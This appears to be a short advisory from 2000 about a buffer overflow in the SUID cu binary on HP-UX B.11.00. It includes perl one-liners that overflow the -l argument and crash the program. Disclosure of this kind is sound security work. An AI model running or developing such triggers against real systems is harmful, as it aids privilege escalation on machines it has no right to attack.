HP-UX vB.11.00 comes with /bin/cu SUID bin, which has a buffer overflow in the -l switch.
77af8460241fd99399a8eb2a90950ce6aa3a1b5653ac799c208865c42b2ef1d5
=======================================================
HPUX cu -l option buffer overflow vulnerability
=======================================================
Date: 02/11/2000
Tested on HP-UX B.11.00
$ ls -la `which cu`
-r-sr-xr-x 1 bin 40960 9 avr 1998 /bin/cu
Using '-l' with a long option string:
$ cu -l `perl -e 'printf "A" x 9777'`
La connexion a chou : Requested device/system name not known
$ cu -l `perl -e 'printf "A" x 9778'`
Memory fault
==================================
zorgon <zorgon@linuxstart.com>
https://www.nightbird.free.fr
----------------------
Do you do Linux? :)
Get your FREE @linuxstart.com email address at: https://www.linuxstart.com